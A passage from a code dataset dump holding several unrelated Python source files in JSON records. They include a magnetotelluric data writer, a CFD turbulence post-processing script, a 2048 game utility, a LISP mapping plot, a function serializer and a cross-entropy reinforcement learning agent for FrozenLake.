chanHeaders[iChan][cH]\r\n\t\t\t\tif cH in keywords:\r\n\t\t\t\t\thdrVal = keywords[cH]\r\n\t\t\t\tchanHeaders[iChan][cH] = hdrVal\r\n\t\treturn chanHeaders\r\n\r\n\r\n\t###################\r\n\t### CALCULATION METHODS\r\n\t##################\r\n\tdef calcStopDateTime(self, fs, numSamples, datetimeStart):\r\n\t\t# calculate duration in seconds\r\n\t\tduration = 1.0*(numSamples-1)/fs # numSamples - 1 because have to remove the initial sample which is taken at start time\r\n\t\tdatetimeStop = datetimeStart + timedelta(seconds=duration)\r\n\t\t# now get this in start and stop times\r\n\t\tstopDate = datetimeStop.strftime(\"%Y-%m-%d\") \t\r\n\t\tstopTime = datetimeStop.strftime(\"%H:%M:%S.%f\")\r\n\t\treturn datetimeStop, stopDate, stopTime\r\n\r\n\r\n\t###################\r\n\t### HEADERWORDS SUPPORTED\r\n\t###################\r\n\tdef globalHeaderwords(self):\r\n\t\tgHeaders = [\"sample_freq\", \"num_samples\", \"start_time\", \"start_date\", \"stop_time\", \"stop_date\", \"meas_channels\"]\r\n\t\treturn gHeaders\r\n\r\n\tdef chanHeaderwords(self):\r\n\t\tcHeaders = [\"sample_freq\", \"num_samples\", \"start_time\", \"start_date\", \"stop_time\", \"stop_date\", \"ats_data_file\", \"sensor_type\", \"channel_type\",\"ts_lsb\", \"lsb_applied\",\r\n\t\t\t \"pos_x1\", \"pos_x2\", \"pos_y1\", \"pos_y2\", \"pos_z1\", \"pos_z2\", \"sensor_sernum\", \"gain_stage1\", \"gain_stage2\", \"hchopper\", \"echopper\"]\r\n\t\treturn cHeaders\t\r\n\r\n\r\n\t###################\r\n\t### WRITE DATA\r\n\t###################\r\n\tdef writeDataset(self, reader, **kwargs):\r\n\t\tif self.getOutPath() == \"\":\r\n\t\t\tself.printWarning(\"No output filepath given\")\r\n\t\t\treturn\r\n\t\t# make the directory\r\n\t\tcheckAndMakeDir(self.getOutPath())\r\n\t\t# write using information from a reader file\r\n\t\theaders = reader.getHeaders()\r\n\t\tchanHeaders, chanMap = reader.getChanHeaders()\r\n\t\tchans = reader.getChannels()\r\n\t\t# now write depending on whether lsb_applied or not\r\n\t\tif \"lsb_applied\" in kwargs and kwargs[\"lsb_applied\"]:\r\n\t\t\tself.write(headers, chanHeaders, chanMap, reader.getPhysicalSamples(), **kwargs)\r\n\t\t\tself.dtype = np.float32\r\n\t\telse:\r\n\t\t\tself.write(headers, chanHeaders, chanMap, reader.getUnscaledSamples(), **kwargs)\r\n\r\n\tdef writeData(self, headers, chanHeaders, data, **kwargs):\r\n\t\tif self.getOutPath() == \"\":\r\n\t\t\tself.printWarning(\"No output filepath given\")\r\n\t\t\treturn\r\n\t\t# make the directory\r\n\t\tcheckAndMakeDir(self.getOutPath())\r\n\t\t# calculate our own cMap\r\n\t\tchanMap = {}\r\n\t\tfor iChan in xrange(0, len(chanHeaders)):\r\n\t\t\tchanType = chanHeaders[iChan]['channel_type']\t\t\r\n\t\t\tchanMap[chanType] = iChan \r\n\t\t# check the data type\r\n\t\tif \"lsb_applied\" in kwargs and kwargs[\"lsb_applied\"]:\r\n\t\t\tself.dtype = np.float32\t\t\r\n\t\t# write the data\r\n\t\tself.write(headers, chanHeaders, chanMap, data, **kwargs)\r\n\r\n\t# write out the dataset\r\n\tdef write(self, headers, chanHeaders, chanMap, data, **kwargs):\r\n\t\t# set global headers for keyword arguments\r\n\t\theaders = self.setGlobalHeadersFromKeywords(headers, kwargs)\r\n\t\t# set channel headers for keyword arguments\r\n\t\tchanHeaders = self.setChanHeadersFromKeywords(chanHeaders, kwargs)\r\n\r\n\t\t# now overwrite the options by checking the actual data\r\n\t\t# let's check all the data sizes\r\n\t\tchans = sorted(list(data.keys()))\r\n\t\tdataSizes = []\r\n\t\tfor c in chans:\r\n\t\t\tdataSizes.append(data[c].size)\r\n\t\tif min(dataSizes) != max(dataSizes):\r\n\t\t\tself.printWarning(\"Channels do not have the same number of samples: {} - {}\".format(\", \".join(chans), \", \".join(dataSizes)))\r\n\t\t\tself.printWarning(\"Only the smallest number of samples will be written out\")\r\n\t\tnumSamples = min(dataSizes)\r\n\r\n\t\t# set number of samples from actual data\r\n\t\theaders[\"num_samples\"] = numSamples\r\n\r\n\t\t# limit data and set the chan header \r\n\t\tfor c in chans:\r\n\t\t\tdata[c] = data[c][:numSamples]\r\n\t\t\tcIndex = chanMap[c]\r\n\t\t\tchanHeaders[cIndex][\"num_samples\"] = numSamples\r\n\r\n\t\t# deal with start and end time\r\n\t\t# the start time does not change on resampling, only the end time\r\n\t\tduration = numSamples/headers[\"sample_freq\"]\r\n\t\t# create datetime objects\r\n\t\tstartString = '{} {}'.format(headers[\"start_date\"], headers[\"start_time\"])\r\n\t\tstopString = '{} {}'.format(headers[\"stop_date\"], headers[\"stop_time\"])\r\n\t\tdatetimeStart = datetime.strptime(startString, \"%Y-%m-%d %H:%M:%S.%f\")\r\n\t\tdatetimeStop = datetime.strptime(stopString, \"%Y-%m-%d %H:%M:%S.%f\")\r\n\t\tdatetimeRecalc, stopDate, stopTime = self.calcStopDateTime(headers[\"sample_freq\"], numSamples, datetimeStart)\r\n\t\t# compare to datetimeStop already\r\n\t\tif datetimeRecalc != datetimeStop:\r\n\t\t\tself.printWarning(\"Note, discrepancy between stop time in given headers and those calculated from data\")\r\n\t\t\tself.printWarning(\"Causes of this might be resampling or interpolation processes and the limiting of data\")\r\n\t\t\tself.printWarning(\"Stop time calculated from data will be used\")\r\n\t\t\tself.printWarning(\"If no resampling, interpolation or limiting of data has been performed, please check all times\")\r\n\t\theaders[\"stop_date\"] = stopDate\r\n\t\theaders[\"stop_time\"] = stopTime\r\n\t\t# do the same for the chan headers\r\n\t\tfor c in chans:\r\n\t\t\tcIndex = chanMap[c]\r\n\t\t\tchanHeaders[cIndex][\"stop_date\"] = stopDate\r\n\t\t\tchanHeaders[cIndex][\"stop_time\"] = stopTime\r\n\r\n\t\t# finally, check the number of measurement channels \r\n\t\theaders[\"meas_channels\"] = len(chans) \r\n\r\n\t\t# now write out the headers and save to class variables\r\n\t\tself.writeHeaders(headers, chans, chanMap, chanHeaders)\r\n\t\tself.headers = headers\r\n\t\tself.chans = chans\r\n\t\tself.chanMap = chanMap\r\n\t\tself.chanHeaders = chanHeaders\r\n\r\n\t\t# write out the data files\r\n\t\tself.writeDataFiles(chans, data)\r\n\r\n\t# write out the header files\r\n\tdef writeHeaders(self, headers, chans, chanMap, chanHeaders):\r\n\t\t# write out the global headers\r\n\t\tf = open(os.path.join(self.getOutPath(), \"global.hdr\"), \"w\")\r\n\t\tf.write(\"HEADER = GLOBAL\\n\")\r\n\t\tglobalHeaderwords = self.globalHeaderwords()\r\n\t\tfor gH in globalHeaderwords:\r\n\t\t\tf.write(\"{} = {}\\n\".format(gH, headers[gH]))\r\n\t\tf.close()\r\n\r\n\t\t# write out the channel headers\r\n\t\tchanHeaderwords = self.chanHeaderwords()\r\n\t\tfor idx, c in enumerate(chans):\r\n\t\t\tcf = open(os.path.join(self.getOutPath(), \"chan_{:02d}.hdr\".format(idx)), \"w\")\r\n\t\t\tcf.write(\"HEADER = CHANNEL\\n\")\r\n\t\t\t# now need to use the cMap to get the index of the cHeaders array\r\n\t\t\tcIndex = chanMap[c]\r\n\t\t\t# change the data file\r\n\t\t\tchanHeaders[cIndex][\"ats_data_file\"] = \"chan_{:02d}{}\".format(idx, self.extension)\r\n\t\t\tfor cH in chanHeaderwords:\r\n\t\t\t\tcf.write(\"{} = {}\\n\".format(cH, chanHeaders[cIndex][cH]))\r\n\t\t\tcf.close()\r\n\t\treturn True\r\n\r\n\tdef writeDataFiles(self, chans, data):\r\n\t\t# implement in the child class\r\n\t\treturn\r\n\r\n\t###################\r\n\t### DEBUG\r\n\t##################\t\t\r\n\t# print headers\r\n\tdef printInfo(self):\t\t\r\n\t\t# print the headers\r\n\t\tself.printInfoBegin()\r\n\t\tself.printText(\"Output file path for data = {}\".format(self.getOutPath()))\r\n\t\t# if it exists, print out the headers\r\n\t\tif self.headers:\r\n\t\t\tself.printText(\"Global Headers\")\r\n\t\t\tself.printText(self.headers)\r\n\t\t# if exists, print out a list of chans\r\n\t\tif self.chans:\r\n\t\t\tself.printText(\"Channels found:\")\r\n\t\t\tself.printText(self.chans)\r\n\t\t# if exists, print out the chanMap\r\n\t\tif self.chanMap:\r\n\t\t\tself.printText(\"Channel Map\")\r\n\t\t\tself.printText(self.chanMap)\r\n\t\t# if it exists, print out the chanHeaders\r\n\t\tif self.chanHeaders:\r\n\t\t\tself.printText(\"Channel Headers\")\r\n\t\t\tfor c in self.chans:\t\t\r\n\t\t\t\tself.printText(c)\r\n\t\t\t\tself.printText(self.chanHeaders[self.chanMap[c]])\r\n\t\tself.printInfoEnd()\r\n\r\n\tdef printInfoBegin(self):\r\n\t\tself.printText(\"####################\")\t\r\n\t\tself.printText(\"DATA WRITER INFO BEGIN\")\t\t\r\n\t\tself.printText(\"####################\")\t\r\n\r\n\tdef printInfoEnd(self):\r\n\t\tself.printText(\"####################\")\r\n\t\tself.printText(\"DATA WRITER INFO END\")\t\t\r\n\t\tself.printText(\"####################\")\t\t\t\r\n\t\t\r\n\tdef printText(self, infoStr):\r\n\t\tgeneralPrint(\"Data Writer Info\", infoStr)\r\n\r\n\tdef printWarning(self, warnStr):\r\n\t\twarningPrint(\"Data Writer Warning\", warnStr)","repo_name":"geobook2015/magPy","sub_path":"core/dataWriter.py","file_name":"dataWriter.py","file_ext":"py","file_size_in_byte":9385,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"71854180921","text":"#Script de recuperation des donnees u* et calcul de U+ et y+\n\nimport optparse\n#import math\nfrom math import *\n\nimport os\n\ndef properties():\n # ouverture des fichiers\n nomFic = 'propertiesGeometry.dat'\n\n fic = open(nomFic,'r')\n\n # lecture de ligne -> entetes\n fichier = fic.readlines()\n\n ligne = fichier [0]\n tLigne = ligne.split()\n mu=float(tLigne[0])\n rho=float(tLigne[1])\n h=float(tLigne[2])\n L=float(tLigne[3])\n\n fic.close()\n return mu,rho,h,L\n\n#fonction de recuperation de la colonne u+\ndef utau():\n # ouverture des fichiers\n nomFicUstar = 'u_tau.dat'\n\n ficUstar = open(nomFicUstar,'r')\n\n # lecture de ligne -> entetes\n fichier = ficUstar.readlines()\n\n #tant que la derniere ligne est vide\n while fichier[-1]==\"\" or fichier[-1]==\"\\n\":\n del fichier [-1]\n\n ligne = fichier [-1]\n tLigne = ligne.split()\n u=float(tLigne[3])\n ficUstar.close()\n return u\n\n\ndef ecritureFichier(u,nomFicData,nomFicData2,rho,mu):\n #ecriture du fichier pour gnuplot\n nomFic = 'courbe_kepsplus.dat'\n ficRead = open(nomFicData,'r')\n ficRead2 = open(nomFicData2,'r')\n fichier = open(nomFic, 'w')\n\n #recuperation des valeurs. attention on suppose que ficRead et ficRead2 ont la meme structure\n fin=False\n while not fin:\n ligne = ficRead.readline()\n ligne2 = ficRead2.readline()\n if not ligne:\n fin=True\n tLigne = ligne.split()\n tLigne2 = ligne2.split()\n if len(tLigne)>0:\n y=float(tLigne[0])\n yPlus=y*rho*float(u)/mu\n kPlus=float(tLigne[1])/(u*u)\n epsPlus=mu*float(tLigne2[1])/(rho*u*u*u*u)\n Ret=kPlus*kPlus/(epsPlus+1e-15)\n fmu=exp(-3.4/((1+Ret/50)*(1+Ret/50)))\n fichier.write(' %18.8f %18.8f %18.8f %18.8f\\n' % (yPlus,kPlus,epsPlus,fmu))\n\n fichier.close()\n ficRead.close()\n ficRead2.close()\n\nif __name__ == '__main__':\n\n parser = optparse.OptionParser()\n (options, args) = parser.parse_args()\n\n mu,rho,h,L = properties()\n\n #recuperation des donnees\n u = utau()\n\n nomFic = args[0]\n nomFic2 = args[1]\n #ecriture du fichier gnuplot\n ecritureFichier(u,nomFic,nomFic2,rho,mu)\n","repo_name":"cea-trust-platform/TrioCFD-code","sub_path":"share/Validation/Rapports_automatiques/Turbulence/RANS/Low_Reynolds/src/courbes_kepsplus.py","file_name":"courbes_kepsplus.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"fr","doc_type":"code","stars":31,"dataset":"github-code","pt":"40"} +{"seq_id":"5172943484","text":"\"\"\"Basic MessageBus implementation.\"\"\"\nfrom dataclasses import dataclass, field\nfrom typing import Callable, DefaultDict, Type, TypeVar\n\nfrom . import email\nfrom .domain.events import Event, OutOfStock\n\nTEvent = TypeVar(\"TEvent\", bound=Event)\nHandler = Callable[[TEvent], None]\n\n\n@dataclass\nclass MessageBus:\n \"\"\"A message bus implementation.\"\"\"\n\n handlers: DefaultDict[Type[Event], list[Handler[Event]]] = field(\n default_factory=lambda: DefaultDict(list)\n )\n\n def handle(self, event: Event) -> None:\n \"\"\"Handle an incoming event.\"\"\"\n for handler in self.handlers[type(event)]:\n handler(event)\n\n def add_handler(self, event: Type[TEvent], handler: Handler[TEvent]) -> None:\n \"\"\"Add an event handler.\"\"\"\n self.handlers[event].append(handler) # type: ignore\n\n\ndef send_out_of_stock_notification(event: OutOfStock) -> None:\n \"\"\"Send a notification when an OutOfStock event happens.\"\"\"\n email.send_mail(\n \"stock@made.com\",\n f\"Out of stock for {event.sku}\",\n )\n","repo_name":"tarcisioe/cosmic","sub_path":"cosmic/messagebus.py","file_name":"messagebus.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9910894290","text":"'''Module contaning functions used to play 2048\r\nNkosi Gumede\r\n30 April 2014'''\r\n\r\nimport copy\r\n\r\ndef create_grid(grid):\r\n \"\"\"create a 4x4 grid\"\"\"\r\n for a in range(4):\r\n grid.append([0,0,0,0])\r\n \r\ndef print_grid (grid):\r\n \"\"\"print out a 4x4 grid in 5-width columns within a box\"\"\"\r\n times=4\r\n column=5\r\n print('+'+'-'*times*column+'+')\r\n for row in range(4): \r\n print(\"|\",end=\"\")\r\n for col in range(4):\r\n if grid[row][col]==0:\r\n grid[row][col]=\" \"\r\n print(\"{0:<5}\".format(grid[row][col]),end=\"\")\r\n else:\r\n print(\"{0:<5}\".format(grid[row][col]),end=\"\")\r\n print(\"|\")\r\n print('+'+'-'*times*column+'+')\r\n \r\ndef check_lost (grid):\r\n \"\"\"return True if there are no 0 values and no adjacent values that are equal; otherwise False\"\"\"\r\n for row in range(4):\r\n for col in range(4):\r\n if grid[row][col]==0:\r\n return False\r\n for row in range(4):\r\n for col in range(4):\r\n specific_grid=grid[row][col]\r\n if 0<=col+1<4:\r\n if specific_grid==grid[row][col+1]:\r\n return False\r\n if 0<col-1<4:\r\n if specific_grid==grid[row][col-1]:\r\n return False\r\n if 0<=row+1<4:\r\n if specific_grid==grid[row+1][col]:\r\n return False\r\n if 0<row-1<4:\r\n if specific_grid==grid[row-1][col]:\r\n return False\r\n \r\n return True\r\n \r\n \r\ndef check_won (grid):\r\n \"\"\"return True if a value>=32 is found in the grid; otherwise False\"\"\"\r\n for row in range(4):\r\n for col in range(4):\r\n if grid[row][col]>=32:\r\n return True\r\n return False\r\n \r\ndef copy_grid (grid):\r\n \"\"\"return a copy of the grid\"\"\"\r\n \r\n copied=copy.deepcopy(grid)\r\n return copied\r\n \r\ndef grid_equal (grid1, grid2):\r\n \"\"\"check if 2 grids are equal - return boolean value\"\"\"\r\n global copy\r\n global grid\r\n copy= grid1\r\n grid= grid2\r\n if copy ==grid:\r\n return True\r\n else:\r\n return False","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_7/gmdnko003/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6853537197","text":"import sys\nimport time\nimport re\nimport os\nimport csv\nimport glob\nimport numpy\nimport statistics\nimport datetime\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport matplotlib.dates as mdates\n#from matplotlib.legend_handler import HandlerLine2D\n#from statsmodels.distributions.empirical_distribution import ECDF\nfrom measurements import results_from_lispmon\nfrom config.config import *\n\n# Parameters to Set\nmap_resolvers = ['217.8.97.6', '217.8.98.42' , '193.162.145.50' , '149.20.48.61' , '149.20.48.77' , '206.223.132.89' , '202.214.86.252' , '202.51.247.10'] # 3*EURO\nstart_date = '20160818'\nend_date = '20160920'\nHour = 12\n\n# Obtaining the Timestamps\nTSPs = []\ntable = open('../Tables/' + map_resolvers[0] + '-LISP-#RLOCs.csv', 'r')\nreader = csv.reader(table)\nfor row in reader:\n del row[0]\n for TSP in row:\n Date = datetime.datetime.fromtimestamp(int(TSP))\n Date.timestamp()\n Date_str = str(Date.year)+str('%02d'%Date.month)+str('%02d'%Date.day)\n if int(start_date) <= int(Date_str) <= int(end_date) and Date.hour == 12:\n TSPs.append(datetime.datetime.fromtimestamp(int(TSP)))\n break\n\n# Obtainning the Information from '-LISP.csv'\nmapping_lists = []\nfor map_resolver in map_resolvers:\n counter_TSP = 0\n mapping_list = []\n while counter_TSP < len(TSPs):\n print(counter_TSP)\n counter_RLOC = 0\n table = open('../Tables/' + map_resolver + '-LISP-#RLOCs.csv', 'r')\n reader = csv.reader(table)\n for row in reader:\n if row[0] == '':\n TSP_position = row.index(str(int(TSPs[counter_TSP].timestamp())))\n continue\n #del row[0]\n if row[TSP_position] != '' :\n counter_RLOC += int(row[TSP_position])\n counter_TSP +=1\n\n mapping_list.append(counter_RLOC)\n\n mapping_lists.append(mapping_list)\n\n\n# Getting the Number of LISP Reply from LISPmon\nmapping_list_LISPmon = results_from_lispmon.rloc_num_counter(start_date , end_date)\n\n\ndel mapping_list_LISPmon[5]\ndel TSPs[14]\ndel TSPs[15]\n\n# plot\n\ndates = matplotlib.dates.date2num(TSPs)\n\nplt.figure(figsize=(20, 9)) # adjust the size of the figure\n# Plot the LISP reply for Map resolvers\nfor x in range(0 , len(map_resolvers)) :\n del mapping_lists[x][14]\n del mapping_lists[x][15]\n plt.plot_date(dates, mapping_lists[x] , ls= '-' , marker='' , label = 'MR ' + str(x+1))\n\n#Plot the LISP Reply for LISPmon\nplt.plot_date(dates, mapping_list_LISPmon, ls='-', marker='' , label = 'LISPmon')\n\n#Setting\n\n# To automatically produce the size of the figure\nmpl.rcParams['text.usetex'] = True\nmpl.rcParams.update({'figure.autolayout': True})\nplt.grid(True)\nplt.axis([ min(dates) , max(dates) , 0 , 100 ])\nplt.xlabel('Time')\nplt.ylabel(' Number of RLOCs ')\nplt.legend( bbox_to_anchor=(1.01, 1.), loc=2, borderaxespad=0.)\nplt.gcf().autofmt_xdate()\n\n\ntry:\n os.stat(os.path.join(FIGURE_PATH))\nexcept:\n os.makedirs(os.path.join(FIGURE_PATH))\nplt.savefig(os.path.join(FIGURE_PATH, 'Mapping_RLOCs.eps'), dpi=300,transparent=True) # you can change the name, just an example\nplt.show() # When you use the above command to save the figure, you can choose to don't show the figure anymore\n\nsys.exit()","repo_name":"SeleneLI/LISP-Views","sub_path":"plot/mapping_RLOCs_figure.py","file_name":"mapping_RLOCs_figure.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1152082197","text":"import matplotlib.pyplot as plt\n\nimport distributions as dist\n\n\ndef wheel_spin(bet: float, variable: dist.Variable) -> float:\n return bet * 2 * variable.trial()\n\n\ndef main() -> list:\n variable = dist.Bernoulli(0.75)\n bank = 100\n seq = [bank]\n iterations = 100\n for n in range(1, iterations):\n bet = 2 / 3 * bank\n bank -= bet\n bank += (wheel_spin(bet, variable))\n seq.append(bank)\n plt.scatter([i for i in range(iterations)], seq)\n plt.xlabel(\"value\")\n plt.ylabel(\"name\")\n plt.title(\"simulation\")\n plt.show()\n return seq\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ltptnt/StatSite","sub_path":"statVisualiser/util/wheelspin.py","file_name":"wheelspin.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"74579312440","text":"\t\ndef getExecutableName(fileName):\n\texecutableName = \"\"\n\tfor i in range(0,len(fileName)):\n\n\t\tif fileName[i] == \".\":\n\t\t\tbreak\n\t\texecutableName = executableName + fileName[i]\n\t\t\n\treturn executableName\n\ndef removeFileNameFromPath(filePath,fileName):\n\tfilePath = list(filePath)\n\tnewFilePath = \"\" \n\tfor i in range( len(filePath) - 1, len(filePath) - len(fileName) - 1 , -1):\n\t\tif filePath[i] != \"/\":\n\t\t\tfilePath[i] = \"\"\n\t\tfilePath[i - 1] = \"\"\n\n\tfor i in range(0,len(filePath)):\n\t\tif filePath[i] != \"\":\n\t\t\tnewFilePath = newFilePath + filePath[i]\n\t\n\treturn newFilePath\n\ndef listToString(string):\n\tli = list(string.split(\"/\")) \n\treturn li\n\n\ndef getFileNameFromPath(filePath):\n\tfileName = \"\"\n\tfPath = filePath\n\tfPathLst = listToString(fPath)\n\n\t#print(\"\\nfPathLst = \" + str(fPathLst))\n\tfPathLength = len(fPathLst)\n\tfileName = str(fPathLst[fPathLength - 1])\n\t#print(\"\\nfileName = \" + fileName)\n\treturn fileName\n#print(removeFileNameFromPath(\"home/saswat/CUDA-Image-Encryption/src/make_serial.mk\",\"make_serial.mk\"))\n#print((getExecutableName(\"def.mk\")))\n#print(getFileNameFromPath(\"/s/abcd.mk\"))\n#print(getExecutableName(\"abc.mk\"))\n\n\n\n","repo_name":"LuisAlexisSalazar/ParalelasGrupoFelipexFinal","sub_path":"basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5910385528","text":"import inspect\nimport json\nimport types\n\nfrom CustomSerializer.task.my_parser import parse_loads, parse_dumps\n\nATTRIBUTES = [\n \"__code__\",\n \"__name__\",\n \"__defaults__\",\n \"__closure__\",\n]\n\n\ndef to_object(d, cls):\n obj = cls()\n for elem in d:\n setattr(obj, elem, d[elem])\n return obj\n\n\ndef serialize_obj(obj) -> dict:\n if obj is None:\n return None\n if isinstance(obj, (int, float, bool, str)):\n return obj\n if isinstance(obj, bytes):\n return list(obj)\n if isinstance(obj, (list, tuple)):\n lst = []\n for elem in obj:\n lst.append(serialize_obj(elem))\n return lst\n if type(obj) == dict:\n dct = {}\n for key in obj:\n dct[key] = serialize_obj(obj[key])\n return dct\n if inspect.isroutine(obj):\n return serialize_function(obj)\n dct = {}\n for key, val in inspect.getmembers(obj):\n if callable(val):\n if not \"__\" in val.__name__:\n dct[key] = serialize_function(val)\n else:\n dct[key] = serialize_obj(val)\n return dct\n\n\ndef serialize_function(f: object) -> dict:\n d = {}\n for mem, val in inspect.getmembers(f):\n if mem in ATTRIBUTES:\n d[mem] = serialize_obj(val)\n if mem == \"__code__\":\n d[\"__globals__\"] = {}\n glob = f.__globals__\n for name in val.co_names:\n if name == f.__name__:\n d[\"__globals__\"][name] = f.__name__\n elif not inspect.isbuiltin(name):\n if name in glob:\n if not inspect.ismodule(glob[name]):\n d[\"__globals__\"][name] = serialize_obj(glob[name])\n\n return d\n\n\ndef deserialize_co_consts(cc: list):\n lst = []\n for elem in cc:\n if type(elem) == dict and \"co_code\" in elem:\n lst.append(deserialize_codeobject(elem))\n else:\n lst.append(elem)\n return tuple(lst)\n\n\ndef deserialize_codeobject(code: dict):\n return types.CodeType(\n code['co_argcount'],\n code['co_posonlyargcount'],\n code['co_kwonlyargcount'],\n code['co_nlocals'],\n code['co_stacksize'],\n code['co_flags'],\n bytes(code['co_code']),\n deserialize_co_consts(code['co_consts']),\n tuple(code['co_names']),\n tuple(code['co_varnames']),\n code['co_filename'],\n code['co_name'],\n code['co_firstlineno'],\n bytes(code['co_lnotab']),\n tuple(code['co_freevars']),\n tuple(code['co_cellvars'])\n )\n\n\ndef deserialize_function(f: dict):\n code = f[\"__code__\"]\n details = [deserialize_codeobject(code)]\n\n globs = {\"__builtins__\": __builtins__}\n for elem in f[\"__globals__\"]:\n val = f[\"__globals__\"][elem]\n if type(val) == dict and \"__code__\" in val:\n globs[elem] = deserialize_function(val)\n else:\n globs[elem] = val\n details.append(globs)\n\n for attr in ATTRIBUTES:\n if attr != \"__code__\":\n details.append(f[attr])\n\n result_func = types.FunctionType(*details)\n\n result_func.__globals__[result_func.__name__] = result_func\n\n return result_func\n\n\ndef function_dumps(func) -> str:\n dct = serialize_obj(func)\n return parse_dumps(dct)\n\n\ndef function_dump(func, fp: str):\n s = function_dumps(func)\n f = open(fp, \"w\")\n f.write(s)\n f.close()\n\n\ndef function_loads(s: str) -> object:\n dct = parse_loads(s)\n func = deserialize_function(dct)\n return func\n\n\ndef function_load(fp: str):\n f = open(fp, \"r\")\n s = f.read()\n f.close()\n return function_loads(s)\n","repo_name":"WinterInside1/ISP","sub_path":"Lab2_test/CustomSerializer/task/func_serializer.py","file_name":"func_serializer.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7502663717","text":"while True:\r\n a = input(\"Please enter first number: \")\r\n b = input(\"Please enter second number: \")\r\n\r\n try:\r\n c = int(a) + int(b)\r\n print(c)\r\n except ValueError:\r\n print(\"These are not integers!\")\r\n except Exception as e:\r\n print(str(e))\r\n finally:\r\n print(\"Introduce numbers!\")\r\n","repo_name":"adrianaroxana/Python-Basics","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23494684129","text":"import machine\r\nsda=machine.Pin(0)\r\nscl=machine.Pin(1)\r\n\r\ni2c=machine.I2C(0, sda=sda, scl=scl, freq=400000)\r\naddresses = i2c.scan()\r\ncount = 1\r\nfor address in addresses:\r\n print(count, \" I2C address: \", hex(address))\r\n count+=1","repo_name":"kguilly/BrainControlledWheelchair","sub_path":"Hardware/tests code/I2C/iictest.py","file_name":"iictest.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71079189881","text":"import gym\nfrom collections import namedtuple\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.tensorboard import SummaryWriter\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n# device = torch.device(\"cpu\")\n\nHIDDEN_SIZE = 128\nBATCH_SIZE = 200\nPERCENTILE = 70\nGAMMA = 0.90\n\n\nclass DiscreteOneHotWrapper(gym.ObservationWrapper):\n def __init__(self, env):\n super().__init__(env)\n assert (env.observation_space, gym.spaces.Box)\n self.observation_space = gym.spaces.Box(\n 0.0, 1.0, (env.observation_space.n,), dtype=np.float32\n )\n\n def observation(self, observation):\n res = np.copy(self.observation_space.low)\n res[observation] = 1.0\n return res\n\n\nclass Net(nn.Module):\n def __init__(self, obs_size, hidden_size, n_actions):\n super().__init__()\n self.net = nn.Sequential(\n nn.Linear(obs_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, n_actions),\n )\n\n def forward(self, x):\n return self.net(x)\n\n\nEpisode = namedtuple(\"Episode\", field_names=[\"reward\", \"steps\"])\nEpisodeStep = namedtuple(\"EpisodeStep\", field_names=[\"observation\", \"act\"])\n\n\ndef iterate_batches(env, net, batch_size):\n batch = []\n episode_reward = 0.0\n episode_steps = []\n obs = env.reset()\n sm = nn.Softmax(dim=1)\n\n while True:\n obs_v = torch.FloatTensor([obs]).to(device)\n act_probs_v = sm(net(obs_v))\n action = torch.multinomial(act_probs_v, 1).item()\n\n next_obs, rewa, is_done, _ = env.step(action)\n\n episode_steps.append(EpisodeStep(observation=obs, act=action))\n\n if is_done:\n batch.append(\n Episode(\n reward=rewa * (GAMMA ** len(episode_steps)), steps=episode_steps\n )\n )\n episode_steps = []\n next_obs = env.reset()\n if len(batch) == batch_size:\n yield batch\n batch = []\n obs = next_obs\n\n\ndef filter_batch(batch, percentile):\n rewards = [episode.reward for episode in batch]\n\n reward_bound = np.percentile(rewards, percentile)\n\n train_obs = []\n train_act = []\n elite_batch = []\n\n for episode in batch:\n if episode.reward > reward_bound:\n train_obs.extend([step.observation for step in episode.steps])\n train_act.extend([step.act for step in episode.steps])\n elite_batch.append(episode)\n\n train_obs_v = torch.FloatTensor(train_obs)\n train_act_v = torch.LongTensor(train_act)\n\n return elite_batch, train_obs_v, train_act_v, reward_bound\n\n\nif __name__ == \"__main__\":\n env = gym.make(\"FrozenLake-v0\")\n env = DiscreteOneHotWrapper(env)\n\n # env = gym.wrappers.Monitor(env, directory=\"mon\", force=True)\n obs_size = env.observation_space.shape[0]\n n_actions = env.action_space.n\n\n net = Net(obs_size, HIDDEN_SIZE, n_actions).to(device)\n objective = nn.CrossEntropyLoss()\n optimizer = optim.Adam(net.parameters(), lr=0.01)\n writer = SummaryWriter(comment=\"-frozen_lake\")\n\n full_batch = []\n\n for iter_no, batch in enumerate(iterate_batches(env, net, BATCH_SIZE)):\n\n reward_mean = float(np.mean([episode.reward for episode in batch]))\n\n full_batch, obs_v, acts_v, reward_b = filter_batch(\n full_batch + batch, PERCENTILE\n )\n\n if not full_batch:\n continue\n\n full_batch = full_batch[-500:]\n\n action_scores_v = net(obs_v.to(device))\n\n loss_v = objective(action_scores_v, acts_v.to(device))\n\n optimizer.zero_grad()\n loss_v.backward()\n\n optimizer.step()\n print(\n \"{:d} loss={:.3f}, reward_mean={:.3f}, reward_bound={:.3f}, batch {:d}\".format(\n iter_no, loss_v.item(), reward_mean, reward_b, len(full_batch)\n )\n 